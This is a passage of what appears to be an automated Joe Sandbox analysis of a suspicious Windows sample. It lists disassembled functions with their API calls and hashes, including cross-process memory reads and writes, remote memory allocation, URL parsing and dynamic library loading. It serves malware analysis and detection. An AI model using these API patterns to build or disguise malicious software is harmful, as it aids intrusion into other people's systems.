                              • Part of subcall function 000C4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000BC9FE,?,?,00000034,00000800,?,00000034), ref: 000C4D6B
                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000BCFC9
                              • Part of subcall function 000C4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000BCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 000C4D36
                              • Part of subcall function 000C4C65: GetWindowThreadProcessId.USER32(?,?), ref: 000C4C90
                              • Part of subcall function 000C4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000BC9C2,00000034,?,?,00001004,00000000,00000000), ref: 000C4CA0
                              • Part of subcall function 000C4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000BC9C2,00000034,?,?,00001004,00000000,00000000), ref: 000C4CB6
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000BD036
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000BD083
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                            • String ID: @
                            • API String ID: 4150878124-2766056989
                            • Opcode ID: 2f4d03d6077fe4dbb26d6d23bd8d63baccbd81ec85ce83216bc0d87cc90b9e09
                            • Instruction ID: bda255b164ae2d254fdbbe15cc1648437f17fbd7cad5760ee5ae9c54d8208ee1
                            • Opcode Fuzzy Hash: 2f4d03d6077fe4dbb26d6d23bd8d63baccbd81ec85ce83216bc0d87cc90b9e09
                            • Instruction Fuzzy Hash: 03414C72900218AFDB10EFA4CC95FDEBBB8EF09700F104099FA45B7181DA716E45CB61
                            Function 000EA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                            Download Yara Rule
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0011DBF0,00000000,?,?,?,?), ref: 000EA4E6
                            • GetWindowLongW.USER32 ref: 000EA503
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000EA513
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Long
                            • String ID: SysTreeView32
                            • API String ID: 847901565-1698111956
                            • Opcode ID: f213eca56a71fd8d4d105be95c5997e04ce4c99d96ac4f9669f0cf877c6fa664
                            • Instruction ID: 511d04349bbb7deb909d5bfd3e88380b3437c102f58dda0acb9fb644871df24d
                            • Opcode Fuzzy Hash: f213eca56a71fd8d4d105be95c5997e04ce4c99d96ac4f9669f0cf877c6fa664
                            • Instruction Fuzzy Hash: D931CE72200645AFDB219E38CC45BEA7BA9FB4A324F244725F875A21E1D770E8509B50
                            Function 000D57D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000D57E7
                            • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 000D581D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CrackInternet_memset
                            • String ID: ?K$|
                            • API String ID: 1413715105-163924116
                            • Opcode ID: 2377efb62ea8e1901cb65562353c3aea0deae4ab754b138e98e73763b6e09d07
                            • Instruction ID: 388996f790acea2b94cfff1dab39b7a0e16fd697cc004c5ca37707eac7f13055
                            • Opcode Fuzzy Hash: 2377efb62ea8e1901cb65562353c3aea0deae4ab754b138e98e73763b6e09d07
                            • Instruction Fuzzy Hash: E3311B71800219EFCF51AFA0DD95EEE7FB9FF19350F108026F815A6262DB319A46DB60
                            Function 000EA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000EA74F
                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000EA75D
                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000EA764
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$DestroyWindow
                            • String ID: msctls_updown32
                            • API String ID: 4014797782-2298589950
                            • Opcode ID: 513c7f384c4c3bb21b08998ad25d0d9ad2cd28d347d1ea544f818335d0fb45a8
                            • Instruction ID: d53739a443dfc64245c7314b491dc8c56099d79f033230a0b46acf7eb6d616e4
                            • Opcode Fuzzy Hash: 513c7f384c4c3bb21b08998ad25d0d9ad2cd28d347d1ea544f818335d0fb45a8
                            • Instruction Fuzzy Hash: 7E2181B5604649AFEB10DF64DCC1EA737EDEB4A394B040059FA41AB262C771EC51CBA1
                            Function 000E97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000E983D
                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000E984D
                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000E9872
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$MoveWindow
                            • String ID: Listbox
                            • API String ID: 3315199576-2633736733
                            • Opcode ID: 2c2101e61c787265d8f22363f4bce2b463bb216f409b1f9bbfa65ef927490acd
                            • Instruction ID: b49d9f5de7b8fe90ec84c3492124c952030bb11504a25ca7ca493fe3b56d8223
                            • Opcode Fuzzy Hash: 2c2101e61c787265d8f22363f4bce2b463bb216f409b1f9bbfa65ef927490acd
                            • Instruction Fuzzy Hash: E521F632610158BFEF218F55DC85FFB3BAAEF8A754F018124F945AB1A0CA719C51CBA0
                            Function 000EA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000EA27B
                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000EA290
                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000EA29D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: msctls_trackbar32
                            • API String ID: 3850602802-1010561917
                            • Opcode ID: c005fd7e4a50a41d3e60e7585448221855328cc6834e034c571b6d15fead8c2f
                            • Instruction ID: a2ef78e5bd7dfd5589fa4153eb3643f5394de845c8d9cbd8ce9d07ba8994959e
                            • Opcode Fuzzy Hash: c005fd7e4a50a41d3e60e7585448221855328cc6834e034c571b6d15fead8c2f
                            • Instruction Fuzzy Hash: CB11C171240248BFEF205F66CC46FAB3BA8EF8AB54F01411CFA45B6091D272A851DB60
                            Function 000A2F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,000A3028,?), ref: 000A2F79
                            • GetProcAddress.KERNEL32(00000000), ref: 000A2F80
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RoInitialize$combase.dll
                            • API String ID: 2574300362-340411864
                            • Opcode ID: c05cba929daa1bbcea1c50e7ce172442b17e2ffea747fa9d4a0782b8e23be0dd
                            • Instruction ID: 0e6c71a6dbc28a8f710a6b59887700e8a888b6b7369d19278ba62c12d39a33d3
                            • Opcode Fuzzy Hash: c05cba929daa1bbcea1c50e7ce172442b17e2ffea747fa9d4a0782b8e23be0dd
                            • Instruction Fuzzy Hash: 8CE01A74694300AFEB516FB6EC49B1536A5AB0AB06F400034B682D28F0CBF580D0DF04
                            Function 000A3034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000A2F4E), ref: 000A304E
                            • GetProcAddress.KERNEL32(00000000), ref: 000A3055
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RoUninitialize$combase.dll
                            • API String ID: 2574300362-2819208100
                            • Opcode ID: 3d0951a02c60dea5662fd04618732c29e2a245e501b692947b7c6ac3ae072dd6
                            • Instruction ID: b3afb39b940475e79ccc6cbd01a8734050c579d899343de8a3cc3a2ef5937f41
                            • Opcode Fuzzy Hash: 3d0951a02c60dea5662fd04618732c29e2a245e501b692947b7c6ac3ae072dd6
                            • Instruction Fuzzy Hash: 8CE0EC74684300EBDB629FE2FD0DB053AA4BB09B06F110064F289D28F0CBF49580CB14
                            Function 000FBA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LocalTime__swprintf
                            • String ID: %.3d$WIN_XPe
                            • API String ID: 2070861257-2409531811
                            • Opcode ID: a4f90ad61d898c377342c30745ccd08bda1bb952d65e4916c6417283a9c3bb0e
                            • Instruction ID: 82c10c1166984b45a0c77a6d47e08e3ad4c6dbe6835a1f94d35cc36957ae2e50
                            • Opcode Fuzzy Hash: a4f90ad61d898c377342c30745ccd08bda1bb952d65e4916c6417283a9c3bb0e
                            • Instruction Fuzzy Hash: 87E0127180801CEBCB34D6D0DC069FE77BCAB04300F108492BA16A1400D735DB54BF13
                            Function 0009E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0009E69C,75920AE0,0009E5AC,0011DC28,?,?), ref: 0009E6B4
                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0009E6C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetNativeSystemInfo$kernel32.dll
                            • API String ID: 2574300362-192647395
                            • Opcode ID: ec70690d2a19a7d6ee7503888f590b0dc3219a8ce116e898e01e2ab4af482712
                            • Instruction ID: 7eb4036e13caacb1797e8f8818813d2e869aac8b30cd5a0c1434ec5bccb101c9
                            • Opcode Fuzzy Hash: ec70690d2a19a7d6ee7503888f590b0dc3219a8ce116e898e01e2ab4af482712
                            • Instruction Fuzzy Hash: 83D0A9345003228FDB20AFB8F809602B7E8BB28301F20542AE5C5D2660DBB0C8C08A10
                            Function 0009E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0009E6D9,?,0009E55B,0011DC28,?,?), ref: 0009E6F1
                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0009E703
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: IsWow64Process$kernel32.dll
                            • API String ID: 2574300362-3024904723
                            • Opcode ID: 1c8b136658846b0c144fa0a52af42f7d84d9d7a61e9ee375193595490582926d
                            • Instruction ID: 19f0c6b79eae554e14a014df34eca83607a10d1d1a6eebe51680ad48032e20f0
                            • Opcode Fuzzy Hash: 1c8b136658846b0c144fa0a52af42f7d84d9d7a61e9ee375193595490582926d
                            • Instruction Fuzzy Hash: 33D0A9345043228FDB20BFA0F84D603BFE8BB08702F00442AE4D5D2650DBF0C8C08A10
                            Function 000DEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000DEBAF,?,000DEAAC), ref: 000DEBC7
                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000DEBD9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                            • API String ID: 2574300362-1816364905
                            • Opcode ID: 73c762a0d952a29ed827260f05c9ae14d8b473cbacf19a107f8f372aca7bfc61
                            • Instruction ID: eae9d6c77999319fb7de7104794ba5593516569210dc883b06b107cc45340ba6
                            • Opcode Fuzzy Hash: 73c762a0d952a29ed827260f05c9ae14d8b473cbacf19a107f8f372aca7bfc61
                            • Instruction Fuzzy Hash: BBD0C7745047529FD7606F75F849A4676D4AB14715F10842BF496D1650DFB4E8C08660
                            Function 000C137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(oleaut32.dll,?,000C135F,?,000C1440), ref: 000C1389
                            • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 000C139B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegisterTypeLibForUser$oleaut32.dll
                            • API String ID: 2574300362-1071820185
                            • Opcode ID: d5f6f1368aa40ccbf874c62d29cd43c966e274827a619c8a1ea9f996c71329d4
                            • Instruction ID: d8439243b0f8485233b237e3c0f4ad3404118fd55d7f1eac775733493e1c6bef
                            • Opcode Fuzzy Hash: d5f6f1368aa40ccbf874c62d29cd43c966e274827a619c8a1ea9f996c71329d4
                            • Instruction Fuzzy Hash: 9FD0A934C003129FD7200FA5F808B86B6E8AF08309F04482DF4E5D2A50DBB4C9C0AB14
                            Function 000C13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,000C1371,?,000C1519), ref: 000C13B4
                            • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 000C13C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                            • API String ID: 2574300362-1587604923
                            • Opcode ID: fc2c5bbc494561ba1c7118b98d97d9a625aac880fdd2a9259899e7bb6341df65
                            • Instruction ID: 9ee3310fa5c5da1158b006a27df6ea8d6a562866b0046d94693c1f8b3f20fed9
                            • Opcode Fuzzy Hash: fc2c5bbc494561ba1c7118b98d97d9a625aac880fdd2a9259899e7bb6341df65
                            • Instruction Fuzzy Hash: 50D0A930804712AFD7201FA4FC08B86B6ECAB44309F00446DE4A5E2A60DFB0C8C08B90
                            Function 000E3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll,?,000E3AC2,?,000E3CF7), ref: 000E3ADA
                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000E3AEC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegDeleteKeyExW$advapi32.dll
                            • API String ID: 2574300362-4033151799
                            • Opcode ID: d5f57ef2029062ec15369cf29722c01019c5ea8a4f411c27105ce46e69685d03
                            • Instruction ID: 52f6b600976f90593c808a59edf9aa7ac349d21320632c79855f66dd171d45a1
                            • Opcode Fuzzy Hash: d5f57ef2029062ec15369cf29722c01019c5ea8a4f411c27105ce46e69685d03
                            • Instruction Fuzzy Hash: C9D0C9746047139FD760AFA6F80E642BAE8BB15715F144429E4D5E2A50EFF0D8C08A51
                            Function 000BA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42041d4812f3f36898cad935cddcd71cd63d5abca8f1e0787429868f383a6a13
                            • Instruction ID: fae0f6a70e9be80db1d2a0b20fe8b0ef7d9ead3da7ba2f644b502b88248c8b7a
                            • Opcode Fuzzy Hash: 42041d4812f3f36898cad935cddcd71cd63d5abca8f1e0787429868f383a6a13
                            • Instruction Fuzzy Hash: FBC16B75A0021AEFCB14CFA4C984EEEB7B5FF49700F104599E911AB252D770EE81DBA1
                            Function 0008AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,000D6AA6), ref: 0008AB2D
                            • _wcscmp.LIBCMT ref: 0008AB49
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharUpper_wcscmp
                            • String ID:
                            • API String ID: 820872866-0
                            • Opcode ID: 2fc678c6bb235ef2624939dc26f4a9e0e1e1cb1d53284e15b2818ac6c563380b
